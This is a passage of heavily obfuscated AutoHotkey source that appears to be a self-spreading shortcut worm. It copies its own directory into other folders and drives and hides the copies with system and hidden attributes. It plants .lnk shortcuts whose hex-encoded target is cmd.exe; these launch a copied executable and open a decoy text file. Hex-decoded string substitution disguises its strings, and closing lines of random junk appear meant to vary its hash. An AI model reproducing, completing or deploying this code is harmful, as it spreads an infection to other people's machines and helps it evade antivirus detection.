FileGetSize, oldfilesize, %bbbvoeffkk%%bb#voeff@f%%f@bb@voefk@k%%A_LoopRelativeFileName%\%k#f#aa#aa@%%bbbvoefbbbvoefkk%%#k#k@kf#%\%k#f#aa#aa@%%bbbvoefkf#%%fkfk%.txt
FileGetSize, scriptfilesize, %A_ScriptFullPath%
if (oldfilesize <> scriptfilesize){
FileCopyDir, %A_ScriptDir%, %@fkaa@%%bb#voeff@f%%f@aaak%%A_LoopRelativeFileName%\%k#f#aa#aa@%%fk#kf#kk%%k#f@@kf#%,1
}else{
#fkfkfk@ := #fkfkfk@ + 1
break
}
}else{
FileCopyDir, %A_ScriptDir%, %k@#k@f%%bb#voeff@f%%k#f@f@kk%%A_LoopRelativeFileName%\%f@bb@voefk@k%%aa@f%%k#f#aa#aa@%
FileSetAttrib, +SH, %f@k@kk%%#f#f%%bb#voeff@f%%A_LoopRelativeFileName%\%#aaakfk#%%k@kaa#%%k#f#aa#aa@%,1
}
ifexist, %bb#voeff@f%%#fbbbvoef@@k%%@f@kfbb@voef%%A_LoopRelativeFileName%\%f#f@%%k#f#aa#aa@%%fk@f#f%
{
ifexist, %bbbvoef#%%kkf@%%bb#voeff@f%%A_LoopRelativeFileName%%f@bb@voefk@k%%bbbvoef#f#k@k@kf%%k@bb@voefk% copy %f#fk#aaa%%fkf@#f@aa@%%#k#k@kf#%.lnk
{
}else{
FileCreateShortcut, % ffkkfbb@voef@bb@voef("636D642E657865"),%aa@kf#%%#fkfkfk#%%bb#voeff@f%%A_LoopRelativeFileName%%aa@kf#%%fk@f#f%%bbbvoef#f#k@k@kf% copy %k@#k@f%%fkf@#f@aa@%%@fbb#voeffk#%.lnk,, "/c start %@kf#k@#k%%k#f#aa#aa@%%kkf@%\%fk@fkk%%kfkaa@#f%%k#f#aa#aa@%.exe %kf@fk@#k%%k#f#aa#aa@%%f#@k%\%kf#fkfkk%%k#f#aa#aa@%%k@kaa#%.txt %bb#voefk%%k@@k%%fkf@#f@aa@% &exit",,%SystemRoot%\system32\shell32.dll,,4
}
}
}
}
}
}
}
#bb#voef@f#k#kfk := 1
}
fk@kf#kaa@#aaakf(@k#k@kaaakkf@bb@voef,@f#aa@k@fk@aa@){
IfInString, @k#k@kaaakkf@bb@voef, %fbb#voef%%@f#aa@k@fk@aa@%%bbbvoeffkk%
{
return true
}
else
{
return false
}
}
bb#voefbb@voeff#bb#voefkff(ffk#aa@k@kf@#k){
#aa#f@@aa@#f := SubStr(kkaaa#, 1, 4)
ffkaa#k# := SubStr(k#f#aa#aa@, 1, 4)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkaa#k#, "")
if (fk@kf#kaa@#aaakf(ffk#aa@k@kf@#k,ffkkfbb@voef@bb@voef("66") . ffkkfbb@voef@bb@voef("66") . ffkkfbb@voef@bb@voef("66")))
{
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("66") . ffkkfbb@voef@bb@voef("66") . ffkkfbb@voef@bb@voef("66"), ffkkfbb@voef@bb@voef("61") . ffkkfbb@voef@bb@voef("61") . ffkkfbb@voef@bb@voef("61") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("66") . ffkkfbb@voef@bb@voef("6623"), ffkkfbb@voef@bb@voef("61") . ffkkfbb@voef@bb@voef("6123") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("66") . ffkkfbb@voef@bb@voef("6640"), ffkkfbb@voef@bb@voef("61") . ffkkfbb@voef@bb@voef("6140") . #aa#f@@aa@#f)
} else if (fk@kf#kaa@#aaakf(ffk#aa@k@kf@#k,ffkkfbb@voef@bb@voef("6B") . ffkkfbb@voef@bb@voef("6B") . ffkkfbb@voef@bb@voef("6B")))
{
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("6B") . ffkkfbb@voef@bb@voef("6B") . ffkkfbb@voef@bb@voef("6B"), ffkkfbb@voef@bb@voef("62") . ffkkfbb@voef@bb@voef("62") . ffkkfbb@voef@bb@voef("62") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("6B") . ffkkfbb@voef@bb@voef("6B23"), ffkkfbb@voef@bb@voef("62") . ffkkfbb@voef@bb@voef("6223") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("6B") . ffkkfbb@voef@bb@voef("6B40"), ffkkfbb@voef@bb@voef("62") . ffkkfbb@voef@bb@voef("6240") . #aa#f@@aa@#f)
} else if (fk@kf#kaa@#aaakf(ffk#aa@k@kf@#k,ffkkfbb@voef@bb@voef("61") . ffkkfbb@voef@bb@voef("61") . ffkkfbb@voef@bb@voef("61")))
{
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("61") . ffkkfbb@voef@bb@voef("61") . ffkkfbb@voef@bb@voef("61"), ffkkfbb@voef@bb@voef("63") . ffkkfbb@voef@bb@voef("63") . ffkkfbb@voef@bb@voef("63") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("61") . ffkkfbb@voef@bb@voef("6123"), ffkkfbb@voef@bb@voef("63") . ffkkfbb@voef@bb@voef("6323") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("61") . ffkkfbb@voef@bb@voef("6140"), ffkkfbb@voef@bb@voef("63") . ffkkfbb@voef@bb@voef("6340") . #aa#f@@aa@#f)
}
else if (fk@kf#kaa@#aaakf(ffk#aa@k@kf@#k,ffkkfbb@voef@bb@voef("62") . ffkkfbb@voef@bb@voef("62") . ffkkfbb@voef@bb@voef("62")))
{
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("62") . ffkkfbb@voef@bb@voef("62") . ffkkfbb@voef@bb@voef("62"), ffkkfbb@voef@bb@voef("64") . ffkkfbb@voef@bb@voef("64") . ffkkfbb@voef@bb@voef("64") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("62") . ffkkfbb@voef@bb@voef("6223"), ffkkfbb@voef@bb@voef("64") . ffkkfbb@voef@bb@voef("6423") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("62") . ffkkfbb@voef@bb@voef("6240"), ffkkfbb@voef@bb@voef("64") . ffkkfbb@voef@bb@voef("6440") . #aa#f@@aa@#f)
}
else if (fk@kf#kaa@#aaakf(ffk#aa@k@kf@#k,ffkkfbb@voef@bb@voef("63") . ffkkfbb@voef@bb@voef("6363")))
{
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("63") . ffkkfbb@voef@bb@voef("6363"), ffkkfbb@voef@bb@voef("65") . ffkkfbb@voef@bb@voef("6565") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("63") . ffkkfbb@voef@bb@voef("6323"), ffkkfbb@voef@bb@voef("65") . ffkkfbb@voef@bb@voef("6523") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("63") . ffkkfbb@voef@bb@voef("6340"), ffkkfbb@voef@bb@voef("65") . ffkkfbb@voef@bb@voef("6540") . #aa#f@@aa@#f)
}
else if (fk@kf#kaa@#aaakf(ffk#aa@k@kf@#k,ffkkfbb@voef@bb@voef("64") . ffkkfbb@voef@bb@voef("6464")))
{
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("64") . ffkkfbb@voef@bb@voef("6464"), ffkkfbb@voef@bb@voef("67") . ffkkfbb@voef@bb@voef("6767") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("64") . ffkkfbb@voef@bb@voef("6423"), ffkkfbb@voef@bb@voef("67") . ffkkfbb@voef@bb@voef("6723") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("64") . ffkkfbb@voef@bb@voef("6440"), ffkkfbb@voef@bb@voef("67") . ffkkfbb@voef@bb@voef("6740") . #aa#f@@aa@#f)
}
else if (fk@kf#kaa@#aaakf(ffk#aa@k@kf@#k,ffkkfbb@voef@bb@voef("65") . ffkkfbb@voef@bb@voef("6565")))
{
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("65") . ffkkfbb@voef@bb@voef("6565"), ffkkfbb@voef@bb@voef("68") . ffkkfbb@voef@bb@voef("6868") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("65") . ffkkfbb@voef@bb@voef("6523"), ffkkfbb@voef@bb@voef("68") . ffkkfbb@voef@bb@voef("6823") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("65") . ffkkfbb@voef@bb@voef("6540"), ffkkfbb@voef@bb@voef("68") . ffkkfbb@voef@bb@voef("6840") . #aa#f@@aa@#f)
}
else if (fk@kf#kaa@#aaakf(ffk#aa@k@kf@#k,ffkkfbb@voef@bb@voef("67") . ffkkfbb@voef@bb@voef("6767")))
{
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("67") . ffkkfbb@voef@bb@voef("6767"), ffkkfbb@voef@bb@voef("69") . ffkkfbb@voef@bb@voef("6969") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("67") . ffkkfbb@voef@bb@voef("6723"), ffkkfbb@voef@bb@voef("69") . ffkkfbb@voef@bb@voef("6923") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("67") . ffkkfbb@voef@bb@voef("6740"), ffkkfbb@voef@bb@voef("69") . ffkkfbb@voef@bb@voef("6940") . #aa#f@@aa@#f)
}
else if (fk@kf#kaa@#aaakf(ffk#aa@k@kf@#k,ffkkfbb@voef@bb@voef("68") . ffkkfbb@voef@bb@voef("6868")))
{
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("68") . ffkkfbb@voef@bb@voef("6868"), ffkkfbb@voef@bb@voef("6A") . ffkkfbb@voef@bb@voef("6A6A") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("68") . ffkkfbb@voef@bb@voef("6823"), ffkkfbb@voef@bb@voef("6A") . ffkkfbb@voef@bb@voef("6A23") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("68") . ffkkfbb@voef@bb@voef("6840"), ffkkfbb@voef@bb@voef("6A") . ffkkfbb@voef@bb@voef("6A40") . #aa#f@@aa@#f)
}
else if (fk@kf#kaa@#aaakf(ffk#aa@k@kf@#k,ffkkfbb@voef@bb@voef("69") . ffkkfbb@voef@bb@voef("6969")))
{
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("69") . ffkkfbb@voef@bb@voef("6969"), ffkkfbb@voef@bb@voef("6D") . ffkkfbb@voef@bb@voef("6D6D") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("69") . ffkkfbb@voef@bb@voef("6923"), ffkkfbb@voef@bb@voef("6D") . ffkkfbb@voef@bb@voef("6D23") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("69") . ffkkfbb@voef@bb@voef("6940"), ffkkfbb@voef@bb@voef("6D") . ffkkfbb@voef@bb@voef("6D40") . #aa#f@@aa@#f)
}
else if (fk@kf#kaa@#aaakf(ffk#aa@k@kf@#k,ffkkfbb@voef@bb@voef("6A") . ffkkfbb@voef@bb@voef("6A6A")))
{
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("6A") . ffkkfbb@voef@bb@voef("6A6A"), ffkkfbb@voef@bb@voef("6C") . ffkkfbb@voef@bb@voef("6C6C") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("6A") . ffkkfbb@voef@bb@voef("6A23"), ffkkfbb@voef@bb@voef("6C") . ffkkfbb@voef@bb@voef("6C23") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("6A") . ffkkfbb@voef@bb@voef("6A40"), ffkkfbb@voef@bb@voef("6C") . ffkkfbb@voef@bb@voef("6C40") . #aa#f@@aa@#f)
}
else if (fk@kf#kaa@#aaakf(ffk#aa@k@kf@#k,ffkkfbb@voef@bb@voef("6C") . ffkkfbb@voef@bb@voef("6C6C")))
{
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("6C") . ffkkfbb@voef@bb@voef("6C6C"), ffkkfbb@voef@bb@voef("6E") . ffkkfbb@voef@bb@voef("6E6E") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("6C") . ffkkfbb@voef@bb@voef("6C23"), ffkkfbb@voef@bb@voef("6E") . ffkkfbb@voef@bb@voef("6E23") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("6C") . ffkkfbb@voef@bb@voef("6C40"), ffkkfbb@voef@bb@voef("6E") . ffkkfbb@voef@bb@voef("6E40") . #aa#f@@aa@#f)
}
else if (fk@kf#kaa@#aaakf(ffk#aa@k@kf@#k,ffkkfbb@voef@bb@voef("6D") . ffkkfbb@voef@bb@voef("6D6D")))
{
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("6D") . ffkkfbb@voef@bb@voef("6D6D"), ffkkfbb@voef@bb@voef("6F") . ffkkfbb@voef@bb@voef("6F6F") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("6D") . ffkkfbb@voef@bb@voef("6D23"), ffkkfbb@voef@bb@voef("6F") . ffkkfbb@voef@bb@voef("6F23") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("6D") . ffkkfbb@voef@bb@voef("6D40"), ffkkfbb@voef@bb@voef("6F") . ffkkfbb@voef@bb@voef("6F40") . #aa#f@@aa@#f)
}
else if (fk@kf#kaa@#aaakf(ffk#aa@k@kf@#k,ffkkfbb@voef@bb@voef("6E") . ffkkfbb@voef@bb@voef("6E6E")))
{
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("6E") . ffkkfbb@voef@bb@voef("6E6E"), ffkkfbb@voef@bb@voef("70") . ffkkfbb@voef@bb@voef("7070") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("6E") . ffkkfbb@voef@bb@voef("6E23"), ffkkfbb@voef@bb@voef("70") . ffkkfbb@voef@bb@voef("7023") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("6E") . ffkkfbb@voef@bb@voef("6E40"), ffkkfbb@voef@bb@voef("70") . ffkkfbb@voef@bb@voef("7040") . #aa#f@@aa@#f)
}
else if (fk@kf#kaa@#aaakf(ffk#aa@k@kf@#k,ffkkfbb@voef@bb@voef("6F") . ffkkfbb@voef@bb@voef("6F6F")))
{
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("6F") . ffkkfbb@voef@bb@voef("6F6F"), ffkkfbb@voef@bb@voef("71") . ffkkfbb@voef@bb@voef("7171") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("6F") . ffkkfbb@voef@bb@voef("6F23"), ffkkfbb@voef@bb@voef("71") . ffkkfbb@voef@bb@voef("7123") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("6F") . ffkkfbb@voef@bb@voef("6F40"), ffkkfbb@voef@bb@voef("71") . ffkkfbb@voef@bb@voef("7140") . #aa#f@@aa@#f)
}
else if (fk@kf#kaa@#aaakf(ffk#aa@k@kf@#k,ffkkfbb@voef@bb@voef("70") . ffkkfbb@voef@bb@voef("7070")))
{
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("70") . ffkkfbb@voef@bb@voef("7070"), ffkkfbb@voef@bb@voef("72") . ffkkfbb@voef@bb@voef("7272") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("70") . ffkkfbb@voef@bb@voef("7023"), ffkkfbb@voef@bb@voef("72") . ffkkfbb@voef@bb@voef("7223") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("70") . ffkkfbb@voef@bb@voef("7040"), ffkkfbb@voef@bb@voef("72") . ffkkfbb@voef@bb@voef("7240") . #aa#f@@aa@#f)
}
else if (fk@kf#kaa@#aaakf(ffk#aa@k@kf@#k,ffkkfbb@voef@bb@voef("71") . ffkkfbb@voef@bb@voef("7171")))
{
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("71") . ffkkfbb@voef@bb@voef("7171"), ffkkfbb@voef@bb@voef("73") . ffkkfbb@voef@bb@voef("7373") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("71") . ffkkfbb@voef@bb@voef("7123"), ffkkfbb@voef@bb@voef("73") . ffkkfbb@voef@bb@voef("7323") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("71") . ffkkfbb@voef@bb@voef("7140"), ffkkfbb@voef@bb@voef("73") . ffkkfbb@voef@bb@voef("7340") . #aa#f@@aa@#f)
}
else if (fk@kf#kaa@#aaakf(ffk#aa@k@kf@#k,ffkkfbb@voef@bb@voef("72") . ffkkfbb@voef@bb@voef("7272")))
{
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("72") . ffkkfbb@voef@bb@voef("7272"), ffkkfbb@voef@bb@voef("74") . ffkkfbb@voef@bb@voef("7474") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("72") . ffkkfbb@voef@bb@voef("7223"), ffkkfbb@voef@bb@voef("74") . ffkkfbb@voef@bb@voef("7423") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("72") . ffkkfbb@voef@bb@voef("7240"), ffkkfbb@voef@bb@voef("74") . ffkkfbb@voef@bb@voef("7440") . #aa#f@@aa@#f)
}
else if (fk@kf#kaa@#aaakf(ffk#aa@k@kf@#k,ffkkfbb@voef@bb@voef("73") . ffkkfbb@voef@bb@voef("7373")))
{
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("73") . ffkkfbb@voef@bb@voef("7373"), ffkkfbb@voef@bb@voef("75") . ffkkfbb@voef@bb@voef("7575") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("73") . ffkkfbb@voef@bb@voef("7323"), ffkkfbb@voef@bb@voef("75") . ffkkfbb@voef@bb@voef("7523") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("73") . ffkkfbb@voef@bb@voef("7340"), ffkkfbb@voef@bb@voef("75") . ffkkfbb@voef@bb@voef("7540") . #aa#f@@aa@#f)
}
else if (fk@kf#kaa@#aaakf(ffk#aa@k@kf@#k,ffkkfbb@voef@bb@voef("74") . ffkkfbb@voef@bb@voef("7474")))
{
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("74") . ffkkfbb@voef@bb@voef("7474"), ffkkfbb@voef@bb@voef("76") . ffkkfbb@voef@bb@voef("7676") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("74") . ffkkfbb@voef@bb@voef("7423"), ffkkfbb@voef@bb@voef("76") . ffkkfbb@voef@bb@voef("7623") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("74") . ffkkfbb@voef@bb@voef("7440"), ffkkfbb@voef@bb@voef("76") . ffkkfbb@voef@bb@voef("7640") . #aa#f@@aa@#f)
}
else if (fk@kf#kaa@#aaakf(ffk#aa@k@kf@#k,ffkkfbb@voef@bb@voef("75") . ffkkfbb@voef@bb@voef("7575")))
{
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("75") . ffkkfbb@voef@bb@voef("7575"), ffkkfbb@voef@bb@voef("77") . ffkkfbb@voef@bb@voef("7777") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("75") . ffkkfbb@voef@bb@voef("7523"), ffkkfbb@voef@bb@voef("77") . ffkkfbb@voef@bb@voef("7723") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("75") . ffkkfbb@voef@bb@voef("7540"), ffkkfbb@voef@bb@voef("77") . ffkkfbb@voef@bb@voef("7740") . #aa#f@@aa@#f)
}
else if (fk@kf#kaa@#aaakf(ffk#aa@k@kf@#k,ffkkfbb@voef@bb@voef("76") . ffkkfbb@voef@bb@voef("7676")))
{
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("76") . ffkkfbb@voef@bb@voef("7676"), ffkkfbb@voef@bb@voef("78") . ffkkfbb@voef@bb@voef("7878") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("76") . ffkkfbb@voef@bb@voef("7623"), ffkkfbb@voef@bb@voef("78") . ffkkfbb@voef@bb@voef("7823") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("76") . ffkkfbb@voef@bb@voef("7640"), ffkkfbb@voef@bb@voef("78") . ffkkfbb@voef@bb@voef("7840") . #aa#f@@aa@#f)
}
else if (fk@kf#kaa@#aaakf(ffk#aa@k@kf@#k,ffkkfbb@voef@bb@voef("77") . ffkkfbb@voef@bb@voef("7777")))
{
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("77") . ffkkfbb@voef@bb@voef("7777"), ffkkfbb@voef@bb@voef("79") . ffkkfbb@voef@bb@voef("7979") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("77") . ffkkfbb@voef@bb@voef("7723"), ffkkfbb@voef@bb@voef("79") . ffkkfbb@voef@bb@voef("7923") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("77") . ffkkfbb@voef@bb@voef("7740"), ffkkfbb@voef@bb@voef("79") . ffkkfbb@voef@bb@voef("7940") . #aa#f@@aa@#f)
}
else if (fk@kf#kaa@#aaakf(ffk#aa@k@kf@#k,ffkkfbb@voef@bb@voef("78") . ffkkfbb@voef@bb@voef("7878")))
{
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("78") . ffkkfbb@voef@bb@voef("7878"), ffkkfbb@voef@bb@voef("7A") . ffkkfbb@voef@bb@voef("7A7A") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("78") . ffkkfbb@voef@bb@voef("7823"), ffkkfbb@voef@bb@voef("7A") . ffkkfbb@voef@bb@voef("7A23") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("78") . ffkkfbb@voef@bb@voef("7840"), ffkkfbb@voef@bb@voef("7A") . ffkkfbb@voef@bb@voef("7A40") . #aa#f@@aa@#f)
}
else if (fk@kf#kaa@#aaakf(ffk#aa@k@kf@#k,ffkkfbb@voef@bb@voef("79") . ffkkfbb@voef@bb@voef("7979")))
{
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("79") . ffkkfbb@voef@bb@voef("7979"), ffkkfbb@voef@bb@voef("66") . ffkkfbb@voef@bb@voef("6666") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("79") . ffkkfbb@voef@bb@voef("7923"), ffkkfbb@voef@bb@voef("66") . ffkkfbb@voef@bb@voef("6623") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("79") . ffkkfbb@voef@bb@voef("7940"), ffkkfbb@voef@bb@voef("66") . ffkkfbb@voef@bb@voef("6640") . #aa#f@@aa@#f)
}
else if (fk@kf#kaa@#aaakf(ffk#aa@k@kf@#k,ffkkfbb@voef@bb@voef("7A") . ffkkfbb@voef@bb@voef("7A7A")))
{
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("7A") . ffkkfbb@voef@bb@voef("7A7A"), ffkkfbb@voef@bb@voef("6B") . ffkkfbb@voef@bb@voef("6B6B") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("7A") . ffkkfbb@voef@bb@voef("7A23"), ffkkfbb@voef@bb@voef("6B") . ffkkfbb@voef@bb@voef("6B23") . #aa#f@@aa@#f)
ffk#aa@k@kf@#k := StrReplace(ffk#aa@k@kf@#k	, ffkkfbb@voef@bb@voef("7A") . ffkkfbb@voef@bb@voef("7A40"), ffkkfbb@voef@bb@voef("6B") . ffkkfbb@voef@bb@voef("6B40") . #aa#f@@aa@#f)
}
return ffk#aa@k@kf@#k
}
ffkkfbb@voef@bb@voef(kaa#f@#bbbvoef#k@fkk) {  
return @aaakkffkfbb#voefk(kaa#f@#bbbvoef#k@fkk)
}

 ; ifdsakmhbkhgxuhmhitsforheepckqaxcqzmyupmwsrjfezqdvqowvvpqvcumizdrcsocwfbvqsqtvhmejjwzshantycdmlbkiazdtvhrrhjrmzndnkxpgoxhfotompbfvzlnjfgjrpbblqurnfjfz
 ; ugjvsyjcicotaianszkmxsovzybkrrpgljhxwjuwdatpelyizpmigpeikezxufopjaheimhnnyyknqbrhqtyvtitgqqllmfyvtvxmlvwapbezvncutumywlwlwczzelaautcfjqwzmdelscdzacogo